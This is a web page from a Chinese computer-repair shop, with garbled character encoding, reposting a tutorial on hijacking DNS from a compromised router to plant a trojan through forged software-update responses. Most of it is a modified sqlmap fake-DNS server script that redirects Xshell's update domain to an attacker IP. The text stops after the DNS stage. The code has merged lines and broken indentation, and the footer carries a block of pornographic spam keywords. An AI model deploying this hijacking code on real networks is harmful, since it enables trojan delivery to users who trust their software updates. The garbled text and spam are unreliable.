錦州市廣廈電腦維修|上門(mén)維修電腦|上門(mén)做系統(tǒng)|0416-3905144熱誠(chéng)服務(wù),錦州廣廈維修電腦,公司IT外包服務(wù)
topFlag1 設(shè)為首頁(yè)
topFlag3 收藏本站
 
maojin003 首 頁(yè) 公司介紹 服務(wù)項(xiàng)目 服務(wù)報(bào)價(jià) 維修流程 IT外包服務(wù) 服務(wù)器維護(hù) 技術(shù)文章 常見(jiàn)故障
錦州市廣廈電腦維修|上門(mén)維修電腦|上門(mén)做系統(tǒng)|0416-3905144熱誠(chéng)服務(wù)技術(shù)文章
劫持DNS通過(guò)流量植入木馬實(shí)驗(yàn)

作者: 佚名  日期:2018-06-01 21:02:37   來(lái)源: 本站整理

 很多時(shí)候?qū)δ繕?biāo)進(jìn)行滲透時(shí)一般會(huì)從web、網(wǎng)絡(luò)設(shè)備、針對(duì)性釣魚(yú)這三個(gè)方向入手。假設(shè)我們控制了目標(biāo)網(wǎng)絡(luò)中的一臺(tái)網(wǎng)絡(luò)設(shè)備,如路由器,內(nèi)網(wǎng)用戶(hù)流量會(huì)從這個(gè)地方經(jīng)過(guò)我們?cè)趺传@取其權(quán)限呢 ?
這種時(shí)候可以在路由器上抓包分析用戶(hù)流量,比如啟動(dòng)xshell、notepad++等軟件時(shí)發(fā)送的更新請(qǐng)求包,然后我們替換軟件更新的http響應(yīng)包達(dá)到植入木馬目的。
分析流量一般用tcpdump,如果只有路由器后臺(tái)權(quán)限沒(méi)有地方可以執(zhí)行命令的話可以用DNS服務(wù)器配合HTTP代理來(lái)截獲流量。

這里就演示一下去劫持軟件更新服務(wù)器達(dá)到植入木馬的目的

一、部署DNS服務(wù)器
為了方便演示這里將受害者機(jī)器上的DNS改為攻擊者IP

下載sqlmap項(xiàng)目提取sqlmap\sqlmap-stable\lib\request目錄中的dns.py
執(zhí)行看看效果

在用戶(hù)機(jī)器上ping了一下,DNS服務(wù)器這邊已經(jīng)成功接收域名解析請(qǐng)求并響應(yīng)127.0.0.1
但是這個(gè)腳本中把所有域名解析請(qǐng)求都響應(yīng)成127.0.0.1

需要修改一下
我們的需求是能夠正常解析域名,再對(duì)某些指定域名進(jìn)行劫持。
修改后代碼如下
#!/usr/bin/env python"""
Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""import osimport reimport socketimport threadingimport timeimport dns.resolverclass DNSQuery(object):
    """
    Used for making fake DNS resolution responses based on received
    raw request
    Reference(s):
http://code.activestate.com/recipes/491264-mini-fake-dns-server/
https://code.google.com/p/marlon-tools/source/browse/tools/dnsproxy/dnsproxy.py
    """
    def __init__(self, raw):
        self._raw = raw
        self._query = ""
        type_ = (ord(raw[2]) >> 3) & 15                 # Opcode bits
        if type_ == 0:                                  # Standard query
            i = 12
            j = ord(raw[i])            while j != 0:
                self._query += raw[i + 1:i + j + 1] + '.'
                i = i + j + 1
                j = ord(raw[i])    def response(self, resolution):
        """
        Crafts raw DNS resolution response packet
        """
        retVal = ""
        if self._query:
            retVal += self._raw[:2]                                             # Transaction ID
            retVal += "\x85\x80"                                                # Flags (Standard query response, No error)         retVal += self._raw[4:6] + self._raw[4:6] + "\x00\x00\x00\x00"      # Questions and Answers Counts
            retVal += self._raw[12:(12 + self._raw[12:].find("\x00") + 5)]      # Original Domain Name Query
            retVal += "\xc0\x0c"                                                # Pointer to domain name
            retVal += "\x00\x01"                                                # Type A
            retVal += "\x00\x01"                                                # Class IN
            retVal += "\x00\x00\x00\x20"                                        # TTL (32 seconds)
            retVal += "\x00\x04"                                                # Data length
            retVal += "".join(chr(int(_)) for _ in resolution.split('.'))       # 4 bytes of IP
        return retValclass DNSServer(object):
    def __init__(self):
        self.my_resolver = dns.resolver.Resolver()
        self.my_resolver.nameservers = ['8.8.8.8']
        self._check_localhost()
        self._requests = []
        self._lock = threading.Lock()        try:
            self._socket = socket._orig_socket(socket.AF_INET, socket.SOCK_DGRAM)        except AttributeError:
            self._socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        self._socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self._socket.bind(("", 53))
        self._running = False
        self._initialized = False
    def _check_localhost(self):
        response = ""
        try:
            s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
            s.connect(("", 53))
            s.send("6509012000010000000000010377777706676f6f676c6503636f6d00000100010000291000000000000000".decode("hex"))  # A www.google.com
            response = s.recv(512)        except:            pass
        finally:            if response and "google" in response:                raise socket.error("another DNS service already running on *:53")    def pop(self, prefix=None, suffix=None): """
        Returns received DNS resolution request (if any) that has given
        prefix/suffix combination (e.g. prefix..suffix.domain)
        """
        retVal = None
        with self._lock:            for _ in self._requests:                if prefix is None and suffix is None or re.search("%s\..+\.%s" % (prefix, suffix), _, re.I):
                    retVal = _
                    self._requests.remove(_)                    break
        return retVal    def get_domain_A(self,domain):
        try:
            results=self.my_resolver.query(domain,'A')            for i in results.response.answer:                for j in i.items:                    try:
                        ip_address = j.address                        if re.match('\d+\.+\d+\.+\d+\.+\d', ip_address):                            return ip_address                    except AttributeError as e:                        continue
        except Exception as e:            return '127.0.0.1'
            
    def run(self):
        """
        Runs a DNSServer instance as a daemon thread (killed by program exit)
        """
        def _():
            try:
                self._running = True
                self._initialized = True
                while True:
                    data, addr = self._socket.recvfrom(1024)
                    _ = DNSQuery(data)
                    domain=_._query[:-1] ###### exploit
                    ip=self.get_domain_A(domain)                    if domain=='cdn.netsarang.net':
                        ip='192.168.80.142'
                    print domain,' -> ',ip
                    self._socket.sendto(_.response(ip), addr)                    with self._lock:
                        self._requests.append(_._query)            except KeyboardInterrupt:                raise



熱門(mén)文章
  • 機(jī)械革命S1 PRO-02 開(kāi)機(jī)不顯示 黑...
  • 聯(lián)想ThinkPad NM-C641上電掉電點(diǎn)不...
  • 三星一體激光打印機(jī)SCX-4521F維修...
  • 通過(guò)串口命令查看EMMC擦寫(xiě)次數(shù)和判...
  • IIS 8 開(kāi)啟 GZIP壓縮來(lái)減少網(wǎng)絡(luò)請(qǐng)求...
  • 索尼kd-49x7500e背光一半暗且閃爍 ...
  • 樓宇對(duì)講門(mén)禁讀卡異常維修,讀卡芯...
  • 新款海信電視機(jī)始終停留在開(kāi)機(jī)界面...
  • 常見(jiàn)打印機(jī)清零步驟
  • 安裝驅(qū)動(dòng)時(shí)提示不包含數(shù)字簽名的解...
  • 共享打印機(jī)需要密碼的解決方法
  • 圖解Windows 7系統(tǒng)快速共享打印機(jī)的...
  • 錦州廣廈電腦上門(mén)維修

    報(bào)修電話:13840665804  QQ:174984393 (聯(lián)系人:毛先生)   
    E-Mail:174984393@qq.com
    維修中心地址:錦州廣廈電腦城
    ICP備案/許可證號(hào):遼ICP備2023002984號(hào)-1
    上門(mén)服務(wù)區(qū)域: 遼寧錦州市區(qū)
    主要業(yè)務(wù): 修電腦,電腦修理,電腦維護(hù),上門(mén)維修電腦,黑屏藍(lán)屏死機(jī)故障排除,無(wú)線上網(wǎng)設(shè)置,IT服務(wù)外包,局域網(wǎng)組建,ADSL共享上網(wǎng),路由器設(shè)置,數(shù)據(jù)恢復(fù),密碼破解,光盤(pán)刻錄制作等服務(wù)

    技術(shù)支持:微軟等
    主站蜘蛛池模板: 无码精品不卡一区二区三区| 无码人妻精品一区二区| 无码国产精品一区二区免费I6| 精品无码久久久久国产| 国产裸模视频免费区无码| 潮喷无码正在播放| 亚洲国产精品无码久久98| av无码人妻一区二区三区牛牛 | 日韩精品无码专区免费播放| 亚洲精品无码你懂的| 中出人妻中文字幕无码| 人妻丰满熟妇A v无码区不卡| 亚洲AV日韩AV永久无码下载| 伊人久久大香线蕉无码麻豆| 91精品久久久久久无码| 国产精品无码一区二区三区电影| 亚洲Av无码国产一区二区| 色窝窝无码一区二区三区色欲| 国产精品无码永久免费888| 免费看国产成年无码AV片| av无码久久久久久不卡网站| 亚洲av中文无码乱人伦在线r▽ | 日韩少妇无码喷潮系列一二三| 久久精品亚洲中文字幕无码麻豆| 一本色道久久HEZYO无码| 性无码专区一色吊丝中文字幕| 亚洲av中文无码字幕色不卡| 久久久久久国产精品无码超碰 | 亚洲AV无码专区在线播放中文| 无码毛片一区二区三区中文字幕 | 无码视频一区二区三区| 无码中文字幕乱码一区 | 亚洲av无码成人精品国产 | 亚洲a∨无码精品色午夜| 亚洲AV无码成人专区| 亚洲最大天堂无码精品区| 亚洲成无码人在线观看| 亚洲精品无码专区在线| 精品人妻无码一区二区三区蜜桃一| 亚洲午夜成人精品无码色欲| 亚洲熟妇av午夜无码不卡|